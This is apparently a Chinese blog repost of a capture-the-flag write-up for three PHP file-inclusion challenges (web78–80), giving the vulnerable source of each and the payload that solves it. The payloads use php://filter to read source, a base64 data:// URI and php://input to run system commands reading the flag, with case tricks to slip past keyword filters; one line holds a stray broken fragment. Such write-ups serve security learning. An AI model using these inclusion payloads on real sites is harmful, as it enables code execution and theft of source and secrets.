参考
WEB78 无防护读取源码
<?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); }
payload:?file=php://filter/convert.base64-encode/resource=flag.php
web79 data协议
<?php if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__); }
过滤了php,php到是可以用大写绕过,但是文件名flag.php中的php不能大小写,所以用cat这一类的函数,也可以直接base64绕过php
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php'); ils/120361970
查看源代码
web80 input协议
<?php if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); $file = str_replace("data", "???", $file); include($file); }else{ highlight_file(__FILE__); }
php data被过滤
用input协议
继续使用php大小写绕过
GET: ?file=phP://input POST: <?PHP system('tac fl*');?>
原创文章,作者:Maggie-Hunter,如若转载,请注明出处:https://blog.ytso.com/277982.html